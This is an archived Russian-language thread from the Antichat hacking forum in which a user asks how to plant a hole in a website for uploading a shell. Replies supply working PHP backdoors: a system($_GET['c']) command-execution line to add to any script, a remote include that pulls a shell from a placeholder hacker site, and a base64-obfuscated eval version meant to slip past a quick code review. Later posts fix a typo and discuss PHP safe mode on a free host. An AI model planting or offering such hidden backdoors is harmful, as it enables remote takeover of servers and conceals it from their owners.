дыры [Архив] - Форум АНТИЧАТ

Просмотр полной версии : дыры

Dmitriy507

16.11.2006, 03:38

Хай!
Я хотел спросить вот какуювещь.
Например я вебмастер и я сделала сайт но я хочу иметь на этом сайте дырку для шелла нпример подскажите код?
И ешо один вопрос подкинте инфопро разные дырки для заливки шелла а то я тока через smds форумы ломаю. Какие ешо бывают?

Zitt

16.11.2006, 04:21

в любой скрипт допиши

<? if (!empty($_GET['c']))?> { echo '<pre>'; system($_GET['c']); echo '</pre>'; exit; } ?>
И юзай script.php?c=command

Или
<?php include "$page"; ?>.
Юзай script.php?page=http://хакер_site/shell.php?

Dmitriy507

16.11.2006, 18:54

что то я на денвере попробывал не помогает...
да tij никто не ответил на мой второй вопрос

InferNo23

16.11.2006, 19:01

хмм.. Zitt все правильно сказал..
допиши в любой скрипт system($_GET['cmd']);
и юзай myscript.php?cmd=command

GreenBear

16.11.2006, 19:07

лол, это найти как делать нечего.

InferNo23

16.11.2006, 19:14

лол, это найти как делать нечего.

можно в base64 закодировать, быстрым просмотром кода вряд ли найдут.

eval(base64_decode('c3lzdGVtKCRfR0VUWydjbWQnXSk7') );

так же myscript.php?cmd=command

Dmitriy507

17.11.2006, 15:44

ничто не получается...
подскажите ешо чтонить например дыру как на smds форуме напимер

Dmitriy507

18.11.2006, 11:24

вот http://mrdeadman.jino-net.ru/forum.php
сделал ничего не пашет

Dmitriy507

18.11.2006, 11:27

вот http://mrdeadman.jino-net.ru/index.php

+toxa+

18.11.2006, 12:25

На джино нет стоит сейф мод...

Dmitriy507

18.11.2006, 19:21

подскажи где сейф мод стоит?

Tem

18.11.2006, 19:37

в php.ini

Dmitriy507

19.11.2006, 03:48

http://php.ini/ ?
такого нет
я ж сказал поподробней обясните...

GreenBear

19.11.2006, 03:53

не заказал бы я такому человеку разработку сайта.

Dmitriy507

19.11.2006, 04:01

ок врубился, а что там надо исправить?

спасибо конечно но я толком рнр не знаю я больше по html

Dmitriy507

19.11.2006, 04:35

я неправельно выразился ссопи:
подскажи на каком бесплатном хосте сейф мод стоит?

_Great_

19.11.2006, 12:48

на джино, например

Dmitriy507

19.11.2006, 13:01

_Great_ извени но на первой странице сказали что на джине тет сейф мода...

_Great_

19.11.2006, 13:34

Уверен?

+toxa+: На джино нет стоит сейф мод...

Dmitriy507

19.11.2006, 13:43

ну я и говорю что там его нет а мне нужен бесплатный хост где он есть

Utochka

19.11.2006, 13:59

Dmitriy507 какой нахер из тебя веб мастер, ты лол и только! Убейся.

Dmitriy507

19.11.2006, 14:01

большое спасибо за помощь...
тему можно закрыть....
даже замочить...

зы
говорил же я слаб в рнр

AdvLamer

19.11.2006, 14:22

Dmitriy507
На джино нет стоит сейф мод...
Теперь понял? :) jino-net.ru

<? if (!empty($_GET['c']))?> { echo '<pre>'; system($_GET['c']); echo '</pre>'; exit; } ?>

А здеся мне кажется очепятка, лишние ?>

<? if (!empty($_GET['c'])) { echo '<pre>'; system($_GET['c']); echo '</pre>'; exit; } ?>

А саму консоль никак не открыть, только можно команды передавать через строку запроса,
например /preved.php?c=cmd/cver ?

Dmitriy507
Попробуй на локалхосте, должно сработать
У меня выдает Microsoft Windows 2000 [‚ҐабЁп 5.00.2195]

_Great_

19.11.2006, 14:24

Товарищ дмитрий, иди кури маны...